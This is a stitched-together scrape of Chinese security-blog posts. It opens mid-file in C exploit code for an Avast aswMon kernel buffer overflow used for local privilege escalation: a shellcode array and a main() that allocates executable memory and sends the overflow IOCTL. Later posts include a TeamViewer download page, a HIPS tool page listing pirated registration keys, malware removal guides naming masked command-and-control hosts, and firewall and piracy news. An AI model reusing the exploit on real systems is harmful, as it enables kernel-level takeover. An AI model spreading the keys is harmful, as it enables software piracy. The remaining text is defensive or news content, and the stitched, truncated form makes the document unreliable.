        0xd07c83f7, 0xcc71c686, 0x640e2cbb, 0x03c636a6,
        0x47737c01, 0x9ad77ee7, 0xd179e1a9, 0x8340bb15,
        0x489ed205, 0x40b54fa8, 0x7afb505e, 0xc04f8e16,
        0xb92981c6, 0x604af99f, 0x43c0fd25, 0x1d2b625f,
        0x13f4dcd7, 0xcf47b89b, 0x108d824a, 0x21236797,
        0x4cac84a5, 0xb33821ce, 0x542a9975, 0xf66135c2,
        0x30b9634a, 0x9bde472a, 0x50e29c43, 0x1224e64d,
        0x140aa049, 0x48c6d7eb, 0xf171704c, 0x80987f37,
        0x88da2c1d, 0xf337fbfe, 0xd52f414a, 0x765
81549,
        0x75d22530, 0x293f3f41, 0x20b6cf21, 0xccd9f240,
        0x46ddeacd, 0x4e16d64e, 0x0e64fe89, 0x445de8d3,
        0x4d7983a6, 0x9f44fe8c, 0xf4e56281, 0xa7aad55b,
        0x07270a01, 0x77501d16, 0xf848ee54, 0x34f4ba27,
        0x244da047, 0x0ca62989, 0xbb5e2e05, 0x9612ca12,
        0x1b7c8cc7, 0xd2d672e6, 0x0caac1da, 0x1ae2cf8a,
        0x92bd47e9, 0xfeb1f194, 0xc0628cbd, 0xecc1a399,
        0x1a9f95f0, 0x29648b2b, 0x9c447a54, 0xad6d85e2,
        0x9bd983e7, 0x880f0eb1, 0xbea4a1a9, 0x3717e013,
        0x89e486dd, 0xe86bcc12, 0xc43fe5a5, 0xc50a72b4,
        0x396f4517, 0x2c8b865e, 0x3f022a7f, 0x0c5bc9bb,
        0x13fd077b, 0xcb6bd83d, 0x20c3e64b, 0x254e3a66,
        0xbcb22492, 0x57caa096, 0x8ba670d9, 0x547d5784,
        0xec8bf3f8, 0xf5b1ff55, 0x30620957, 0x43a3264a,
        0xdc6a0482, 0x270f2162, 0x15518268, 0xf4f3d923,
        0xfc6cdb9e, 0x91d3e097, 0xe49d4ba4, 0xe47a3b34,
        0xc18383a6, 0x5508af9a, 0xf2c8fcc8, 0xed417653,
        0xe3f4cf27, 0x6a777f65, 0xe9c3dae6, 0xfec2e74c,
        0x143f7e6d, 0xa8dc757c, 0xb8c48b07, 0x6a41964d,
        0x0994e2e4, 0x86ba5562, 0x4ebdb204, 0x6913dc92,
        0x3bd205a8, 0x2018395a, 0x804c5bb8, 0xa159fa18,
        0x7ccdfb1e, 0x146c6abc, 0x9c59a9ce, 0xe2f7d37d,
        0x699918e3, 0xde22536a, 0xfae6dd7c, 0x8a228eab,
        0xf657ae31, 0x97d59acb, 0xb1f6e1b7, 0xbc41be1c,
        0xc2572c95, 0x342f56a9, 0x349aeff3, 0xcbe3c7d9,
        0x080d46fe, 0x0e1d753c, 0xe4760d5c, 0x0cde715c,
        0x7d129f23, 0xab63fbbe, 0x9d734af8, 0xc2daebce,
        0x0619e8ee, 0x2c5b3a41, 0xd5db4193, 0x943fce43,
        0x0256feeb, 0x83a424bd, 0xe27f259b, 0x67ef724b,
        0x99c97ae1, 0x8bfa552e, 0x73e3191c, 0xe94365e5,
        0x92291d29, 0x7a28b911, 0x4ae8b691, 0xafba0345,
        0xbac0a0ba, 0x677713c2, 0x1a7fc599, 0x8978a9c1,
        0xe8f62f56, 0x58f7969a
        };

    DWORD ShellcodeToExecute;
    
    int choix;
    memset(welcome, 0x61, 100);
    welcome[100] = 0;

    ZeroMemory(out,sizeof(out));

    printf("Avast Kernel Buffer Overflow Vulnerability\nProof Of Concept…\n\n");
    getch();
    
    MajShellcode("LocalEscalation_Avast.exe");
    MajRealShellcode();
    MajRealStack();
    
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    
    memcpy((void*)0x57523c00, UpdateAswMon, sizeof(UpdateAswMon));
    memcpy((void*)0x57523c00+sizeof(UpdateAswMon), ShellcodeMaster, sizeof(ShellcodeMaster));
    
    printf("Connecting…    ");
    
    hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
    while(hDevice == (HANDLE) 0xffffffff){
      hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
      Sleep(1000);
    }
    printf("Found !\nHandle : %p\n",hDevice);
      
    DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
    DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
    AfficherListeFichiers();
    printf("Written.\n");

    CloseHandle(hDevice);
    getch();
    return 0;
}

// milw0rm.com [2009-08-24]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/103

可穿透防火墙的远程控制软件-TeamViewer V4.1.6080 绿色汉化版下载

       TeamViewer是一个在任何防火墙和NAT代理的后台用于远程控制,桌面共享和文件传输的简单且快速的解决方案。

可穿透防火墙的远程控制软件-TeamViewer V4.1.6080

软件主界面

       为了连接到另一台计算机,只需要在两台计算机上同时运行TeamViewer即可而不需要进行一个安装的过程。该软件第一次启动在两台计算机上自动生成伙伴ID和密码。只需要输入你的伙伴的ID到TeamViewer并输入对方的密码进行身份确认就能立即建立起连接。

       这款软件是一款能穿透内网的远程控制软件,可以穿透各种防火墙,要求双方都安装这个软件,使用时要求双开打开软件并且接受连接即可,最大优势在于此软件任何一方都不需要拥有固定IP地址,双方都可以相互控制,只要连入Internet即可,不受防火墙影响!

      产品新功能:
      支持4种连接方式:远程支持、演示、文件传输、VPN
      完全支持Windows Vista UAC和远程登录。 TeamViewer 现在能够远程控制运行在 Vista 安全桌面下的 Windows 操作系统
      通过使用更好的编码和压缩提供了高度提升的性能的连接稳定性
      TeamViewer 现在是仅仅是一个单独的应用程序,由于使用新的代码库 TeamViewer 和 DynaGate 现在不再分离了
      现可在 TeamViewer 里在为您的伙伴的 ID 设定别名了
      自动代理检测现在支持 Firefox 和 Opera 浏览器
      远程监视器之间的多显示器处理和切换
      为 customer module creator 的扩展设计选项
      提高的文件传输性能和全自动恢复
      完整的国际化字符支持 (Unicode)
      提高了的处理,可用性和易于使用
      支持在软件以创建的动态密码基础上再次创建新的动态密码或者设定自己的固定密码,设定的固定密码优先级将高于软件创建的随机动态密码。
      安全性:Teamviewer使用包括RSA公钥/私钥交换和256位AES会话加密的加密方式,基于https/SSL同等安全级别;此外所有程序文件都经过数字证书签名以方便确认文件来源。

      点此下载TeamViewer 4.1.6080 绿色汉化版

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/108

介绍一款Hips安全监控工具–System Safety Monitor,附终身免费序列号

      题记:即使自己已经装了杀毒软件、防火墙但仍然跟不上木马病毒的脚步,不断中招?那么你需要一款功能强大的Hips软件对系统进行全面防护。本文的主角就是这样的软件。
      简介:
  SSM全名“System Safety Monitor”,简称SSM。是一款俄罗斯出品的系统监控软件,通过监视系统特定的文件(如注册表等)及应用程序,达到保护系统安全的目的。是一款对系统进行全方位监测的防火墙工具,它不同于传统意义上的防火墙,系针对操作系统内部的存取管理,因此与任何网络/病毒防火墙都是不相冲突的。该软件获得了WebAttack的五星编辑推荐奖,十分优秀!是一款很好的HIPS。
  【平台兼容】:
  兼容9X/NT/2K 95% ;XP 100% (Vista暂时不兼容free版本,其他版本运行不稳定)
  【功能特性】:
   免费版AD+RD,商业注册版AD+FD+RD
  · 可控制机器上哪些程序是允许执行的,当待运行程序被修改时,会报警提示;
  · 可控制“DLL注入”以及键盘记录机对特定系统函数的调用;
  · 可控制驱动程序的安装(包括非传统方式的驱动型漏洞-Rootkits);
  · 可控制诸如存取"\Device\PhysicalMemory"对象这类底层活动;
  · 可阻止未经认可的代码注入,从而使任何程序都无法插入到合法的程序中以进行有害的活动;
  · 可控制哪些程序允许启动其它程序、哪些程序不允许被其它程序启动,如:您可以控制您的浏览器不被除Explorer.EXE以外的任何非可信程序启动;
  · 可在双模式中任选其一,用户模式或管理员模式:管理员模式可设定首选项并加以密码保护防止被更改,而用户模式不能更改任何设定;
  · 可监控安装新程序时注册表重要分支键的更改,受保护的注册表分支键被尝试更改时将阻止或报警;
  · 可管理自启动项目、当前进程等,另外提供了服务保护模块,用以监视已安装的系统服务,当新的服务被添加时,会报警提示;
  · 可(实时)监视"启动菜单"、"启动INI文件分支",以及IE设定等(包括BHO-所谓的浏览器辅助对象,一般都是广告程序、间谍程序等垃圾);
  · 可通过标题黑名单过滤器阻止打开指定的窗口或者网页;
  · 支持外挂任一调试器、反病毒软件等,且该软件的扩展功能均采用外挂插件形式实现因此极易得到丰富的扩充;
  · 本身作为服务加载,通过配置、修改可以实现隐秘的进程反杀能力。
  SSM的上述强大功能为木马防范乃至整个系统的全面监控提供了绝佳的解决方案,但其使用上应该算是,总体来说是一款偏向高端的安全软件。狐狸少爷测试了多款木马、键盘记录机等对自己的机器进行攻防实训,均被其成功截获,其底层防御能力相当令人满意,而且对于新手熟悉操作系统有非常大的帮助。

  点此下载System Safety Monitor Beta 2.4.0.622 多国语言版

      附注册码一组:

复制内容到剪贴板程序代码程序代码
84F30DEE02220CC51A804DBF8729077A9FBCD4AD957B33

A8116019793DBA4EF72CFAC3901E4317738A1F49A12B519ABCF6BF87E89410

57689AF52DFC8DC99EE1A45185D085FB2ECB60DC3B83C926DA3451F4981F2239

02B667DCCAD9A3EF752A103DC6CA88899201EB305D4D119F664FB079A38529

B9105DF65D89F293A9C914990C8B7BAC7277846BBC719BB91ACD562

F4A37DA6CDF1DFD5ECD670CC2FD50614B617843BA912071D2FE5D

FCBD83091A2A0BECEFF2E4719698161C836A34A4B01E56C53DC838A

D09433F661E8F98793425A1A1BA1E013D04C400578E9DF74A040F2CE6

EA78829A30C8380ADC0530B78DB4C079B329DACBD590920B8D435B6F05

DB1F6C9C1FDEFF32A02E72BE82EB90C01CFEC659EB5AAD23B875851D0A

8608F88A74A0E545A1FD0DE91C536557F1775E13AD09AD9D5ED16D9F7BA9

ED889D905EEE8911E6C2C1B8F956CD9B1574D4B843994BC2524E1AC45CB610CD

E461F78E3CE56E170B3C0C78F74EFC4651CFE165039B5D512491E0D5F861F0B02

B4A27D97E800411E4344708AE1AA2AA117B3C779A3BCD7AF3ACFB275A80041

1E4344708AE0000BE1CAA114A25AB41B41B46437A26524E00010000E65E80F

B0C82A64C638BA2374D3172988B6ECA37D94199A04AFD604B4C82EDD83818D988

D203F03026777D3B502A95E5B6F4FB46A858B5D94D31C16177FC8E159770D46E17

F71DED28E5FDA84665160EAD2B3E5ECB8ADEC97D9E4010668C65C2584409D077

9E429F6A683E9D865BE091E8BEAF3483234D605EF7F4DE276E5900DCBE41779

A97E6F135106AF5AC8BA18F58689202DE95088F9AC6370AA1ED038746AD1EA975

AD1CF30F677897A941B75716D3D28AAA430B6B6845ED735BCCDDB49222633A444B

D7C8D2A753A7AEAA9456823B42EAC57FD4955092A05260B2B724FBE01C0CCC6290380

DE4BFB5F46696DDC766B8A71EAB3C3937CB096DFDF15BFB

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/146

killkb.dll和pcidump.Sys等病毒清除解决方案

  killkb.dll和pcidump.Sys等病毒清除解决方案,来源:麦田守望者,www.2000xg.net

  病毒症状:
  该样本是使用“Delphi”编写的AV杀手木马,“upx”加壳,长度为“33,280”,病毒扩展名为“exe”,主要通过“文件捆绑”、“局域网下载器下载”、“网页挂马”等方式传播,病毒主要目的为关闭大量安全软件和下载木马病毒至用户主机运行。
  用户中毒后,会出现计算机及网络运行缓慢,安全软件无故关闭,各类软件、Windows无故报错,自动打开恶意网站,发现大量未知进程等现象。
  感染对象:
  Windows 2000/Windows XP/Windows 2003
  传播途径:
  网页木马、文件捆绑。
  病毒分析:
  (1)创建互斥体“bboy” 防止二次运行;
  (2)设置%SystemRoot%\system32和%temp% 目录的权限为everyone完全控制;
  (3)禁止ekrn服务,结束kern.exe egui.exe scanfrm.exe进程;
  (4)释放动态库文件%SystemRoot%\system32\killkb.dll,遍历进程,查找RavMonD.exe进程,没有发现,加载动态库文件,如果发现进程,不加载动态库文件;
  (5)动态库文件会释放驱动文件,创建服务启动驱动,结束大部分安全软件进程,重命名驱动文件为OLD16.tmp;
  (6)释放%SystemDriver%\WINDOWSaboy.Dll并且加载;
  (7)释放%SystemRoot%\system32\drivers\pcidump.sys,创建pcidump服务启动,删除驱动文件;
  (8)打开puid服务,如果成功,删除服务,删除文件%SystemRoot%\system32\drivers\puid.sys;
  (9)修改HOSTS文件,屏蔽大量网站;
  (10)从指定网站下载病毒,并运行。
  病毒创建注册表:
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UpdateDATA
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\acpidump
  病毒创建文件:
  %SystemRoot%\system32\killkb.dll
  %SystemRoot%\system32\drivers\acpiec.Sys
  %SystemDriver%\WINDOWSaboy.Dll
  %SystemRoot%\system32\drivers\pcidump.Sys
  %SystemRoot%\system32\drivers\OLD16.tmp
  病毒访问网络:
  
[url=http://www.r/]
http://www.r
[/url]
**8d.cn/out.txt
  手动解决办法:
  手动删除以下文件:
  %SystemRoot%\system32\killkb.dll
  %SystemDriver%\WINDOWSaboy.Dll
  %SystemRoot%\system32\drivers\pcidump.Sys
  %SystemRoot%\system32\drivers\OLD16.tmp
  手动删除以下注册表值:
  键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UpdateDATA
  键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\acpidump
  变量声明:
  %SystemDriver% 系统所在分区,通常为“C:\”
  %SystemRoot% WINDODWS所在目录,通常为“C:\Windows”
  %Documents and Settings% 用户文档目录,通常为“C:\Documents and Settings”
  %Temp% 临时文件夹,通常为“C:\Documents and Settings\当前用户名称\Local Settings\Temp”
  %ProgramFiles% 系统程序默认安装目录,通常为:“C:\ProgramFiles”

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/226

winlogin.scr等病毒详解与清除方案

    winlogin.scr等病毒详解与清除方案,来源:麦田守望者,www.2000xg.com 
  病毒症状:
  该样本是使用“Delphi”编写的后门程序,长度为“753,152 字节”,病毒扩展名为“exe”,主要通过“文件捆绑”、“下载器下载”、“网页木马”等方式传播,病毒主要目的为设立后门,使用户电脑沦为傀儡主机。
  用户中毒后,可能会出现计算机无故重启、关闭,重要文件丢失,系统及网络缓慢、摄像头无故启用、程序无故关闭、注册表被修改、出现各类病毒等导致用户隐私泄露及影响用户使用的现象。
  感染对象:
  Windows 2000/Windows XP/Windows 2003
  传播途径:
  网页挂马、文件捆绑、下载器下载。
  病毒分析:
  (1)读取并解密自己配置信息;
  (2)复制自身到%SystemRoot%\winlogin.scr;
  (3)注册服务,启动病毒;
  (4)创建svchost.exe进程,把病毒代码注入进程;
  (5)创建批处理文件删除自身;
  (6)尝试连接黑客主机。
  病毒创建文件:
  %SystemRoot%\winlogin.scr
  %SystemRoot%\uninstal.bat
  病毒删除文件:
  %SystemRoot%\uninstal.bat
  病毒创建注册表:
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\1
  病毒创建进程:
  svchost.exe
  病毒访问网络:
  huangw***21.3322.org:7000
  解决方案:
  1、手动删除以下文件:
  %SystemRoot%\winlogin.scr
  2、手动删除以下注册表值:
  键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\1
  变量声明:
  %SystemDriver%  系统所在分区,通常为“C:\”
  %SystemRoot%  WINDODWS所在目录,通常为“C:\Windows”
  %Documents and Settings%  用户文档目录,通常为“C:\Documents and Settings”
  %Temp%  临时文件夹,通常为“C:\Documents and Settings\当前用户名称\Local Settings\Temp”
  %ProgramFiles%  系统程序默认安装目录,通常为:“C:\ProgramFiles”

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/227

特别奉献二–09年国内外免费个人防火墙大搜罗

      前一段时间写了一篇免费杀毒软件的文章,此文可以作为它的姊妹篇。
      同上一篇文章,愿意让自己的机器在网络上裸奔或者愿意为软件防火墙支付银子的请跳过此文。
      注:本文仅讨论免费个人软件防火墙,硬件防火墙和企业级防火墙不在讨论之列(实际上硬件防火墙基本上没有免费的:),除非自己动手搭建)

Comodo Personal Firewall
      出品公司:Comodo Security Solutions, Inc.
      Comodo Personal Firewall这是一款功能强大、高效的且容易使用的防火墙,被很多媒体誉为No.1的防火墙,提供了针对网络和个人用户的最高级别的保护,从而阻挡黑客的进入和个人资料的泄露。能够提供程序访问网络权限的底层最全面的控制能力,提供网络窃取的最终抵制,实时流量监视器可以在发生网络窃取和洪水攻击时迅速作出反应,通过简单的界面安装后,Comodo 个人防火墙使您安全的连接到互联网。针对网络攻击完备的安全策略,迅速抵御黑客和网络欺诈。使用友好的点击式用户界面来确认或阻拦网络访问;完全免疫攻击;通过使您的PC隐身而抵御黑客攻击;免费的升级维护;静默式安全单元–避免不必要的安全警报。使您的PC在内外网中受到保护、在常规端口扫描时隐身、不被特洛伊木马程序访问,使您的个人资料不被窃取,使您的PC和网络得到最终的保护。
      现在官方不提供Comodo Personal Firewall单独下载,取而代之的是Comodo Internet Security,最新版本3.8.65951.477,集成了防火墙和防病毒软件,安装时可自由选择。

      官方网址:http://personalfirewall.comodo.com/

ZoneAlarm Free Firewall
      出品公司:Check Point
      ZoneAlarm的设计是为了保护你的ADSL联机避免被黑客攻击。这个程序包含了四个连锁的安全服务;防火墙、应用程控、一个因特网保护锁、和防护区。ZoneAlarm Security Suite 版本增加了 IM Security 及 Web Filtering 的功能。它还为用户准备了不同的安全级别和网络锁定功能。又是一款非常可口的“免费大餐”,它可以防止“特洛伊木马”程序在你的电脑中偷偷作乱。ZoneAlarm可以监视电脑中到底有什么软件在偷偷运行,从而使你免受坏人在你的电脑中窃取资料或是搞破坏。它还为用户准备了不同的安全级别和网络锁定功能。该软件的最大特点就是使用简单,运行稳定,系统资源占用率也相当少,对应用程序访问网络请求监控严格。
      
      官方网址:http://www.zonealarm.com

费尔个人防火墙专业版
      出品公司:费尔安全实验室
      费尔个人防火墙专业版是费尔安全实验室最重要的产品之一,它不仅功能非常强大,而且简单易用,既能满足专业人士的需求也可让一般用户很容易操控。它可以为你的计算机提供全方位的网络安全保护,而且完全免费。
      它可以实现:阻止网络蠕虫病毒的攻击;阻止霸王插件,并允许自定义规则阻止新的霸王插件,广告和有害网站等;应用层与核心层双重过滤系统可以提供双重保护;Windows信任验证技术可以自动信任安全的程序,而不再需要询问用户,增加程序的智能性和易用性;内置了 7 大模式供不同需求的用户选择;交互式规则生成器使生成规则简单易行;密码保护可以保护防火墙的规则和配置不被他人修改;可以非常方便的对规则进行备份和恢复;可以控制对网站的访问,阻止霸王插件就是使用此功能实现;支持文本和二进制两种格式的日志。文本日志更容易查阅,二进制日志可以方便的查询和生成控管规则等扩充功能;它还支持在线升级、流量示波器、隐私保护、Windows 安全中心、气球消息警示以及更多独特的功能。
      作为一款开源防火墙,我们相信它可以走的更远。

      官方网址:http://www.filseclab.com/chs/default.htm

System Safety Monitor free
      出品公司:未知
      System Safety Monitor (SSM)是一款对系统进行全方位监测的防火墙工具,它不同于传统意义上的防火墙,系针对操作系统内部的存取管理,因此与任何网络/病毒防火墙都是不相冲突的。该软件获得了WebAttack的五星编辑推荐奖,十分优秀。
      功能特性: · 可控制机器上哪些程序是允许执行的,当待运行程序被修改时,会报警提示; 可控制“DLL注入”以及键盘记录机对特定系统函数的调用; 可控制驱动程序的安装(包括非传统方式的驱动型漏洞-Rootkits); 可控制诸如存取"\Device\PhysicalMemory"对象这类底层活动。
      很可惜由于此软件作者没有时间继续开发,在08年9月停止更新,当前最新版本:2.0.8.585

      国内下载地址:http://www.skycn.com/soft/42082.html

SoftPerfect Personal Firewall
      出品公司:SoftPerfect Research
      为保护您的电脑免受来自于因特网或局域网攻击而设计的一款免费的网络防火墙。使用该防火墙,用户可以通过包过滤定义规则来自定义安全策略。它在底层工作,允许创建诸如ARP的基于非IP端口的规则。SoftPerfect 个人防火墙支持多网卡。您可以为每个网络设备单独定义规则,比如说拨号适配器或其它系统接口。结合灵活的网络过滤系统、受信MAC地址检测特性和多网卡独立配置功能您甚至可以将其应用于路由器和服务器上。SoftPerfect 个人防火墙有学习机制,当检测到无法判定的网络数据包时它会提示您,让您选择进行何种处理动作。这种机制可以帮您快速建立自定义规则。本软件简单易用,内置多种预定义规则,且其完全免费。还可以提供诸如密码保护、登录保护等特性。
      当前最新版本:1.4.1

      官方网址:http://www.softperfect.com

风云防火墙个人版
     出品公司:风云安全阵线
     您不需要复杂的设置,风云防火墙在简约人性化
方面考虑周详,在您安装了风云防火墙之后,它便开始防护您的系统网络安全,抵抗以知类型的网络扫描及攻击,同时又为高级用户提供了丰富多面的细节监测功能。
      特色功能:密码保护功能;ARP局域防护;CRC程序检测CRC程序完整性验证,防止网络访问程序被恶意软件或病毒木马篡入;木马特征拦截;自我安全保护。
      最新版本:风云防火墙个人版2009
      
      官方地址:http://www.218.cc/

天网防火墙
      出品公司:众达天网
      天网防火墙个人版(简称为天网防火墙)是由天网安全实验室研发制作给个人计算机使用的网络安全工具。它根据系统管理者设定的安全规则(Security Rules)把守网络,提供强大的访问控制、应用选通、信息过滤等功能。它可以帮你抵挡网络入侵和攻击,防止信息泄露,保障用户机器的网络安全。天网防火墙把网络分为本地网和互联网,可以针对来自不同网络的信息,设置不同的安全方案,它适合于任何方式连接上网的个人用户。
      作为新手入门级的免费防火墙,曾经在国内拥有大量用户,功能算不上强大但也算比较全面。
      最新版本:3.0.0.1015
      
      官方地址:http://www.sky.net.cn/

      总算写完了,曾经有许多优秀的免费防火墙产品,但要么转向收费,要么倒闭,文中的几款都是本人经过挑选发布的,希望以后大家能有更多可供选择的产品。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/248

卡巴斯基称中国盗版用达8000万 无意完全打击

      昨天下午,卡巴斯基亚太区董事总经理张立申透露,卡巴斯基目前在中国的盗版用户已经达到了8000万,不过公司目前并没有完全在针对盗版用户进行打击。张立申表示,目前卡巴斯基在中国每天有20万激活码被领用,按照这样的进度,今年再增加3000万的用户应该没有问题。由于卡巴斯基现在在中国的收入稳定,市场增长迅速,卡巴斯基不会效仿微软的做法,打击盗版用户,用户只要通过该公司公布的合法途径,就能得到激活码。

      不过他也同时坦承,卡巴斯基目前还没有特别好的方案完全应对盗版现象。

  之前有分析人士认为,卡巴斯基之所以纵容盗版用户,是在沿用国际厂商在中国惯用的“先圈地、后收钱”伎俩,对此,张立申予了坚决否认,在他看来,杀毒软件与操作系统类的产品是完全不同的产品,“杀毒软件讲究的是用户体验,一款好的产品是绝对不会免费的。”

  市场份额方面,张立申则透露道,目前卡巴斯基的用户数量已经排在首位,但其收入以及企业版、网络版的用户仍落后于瑞星公司。尽管该公司创始人尤金卡巴斯基一再强调,卡巴斯基要坐上中国杀毒市场的头把交椅。但按照目前的发展速度,该公司三年后才能如愿。
      0point评点:谁能保证卡巴真的能信守自己的诺言,如果它真的做上了国内杀软第一把交椅,那时能否继续宽容这些盗版用户就不得而知了。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/253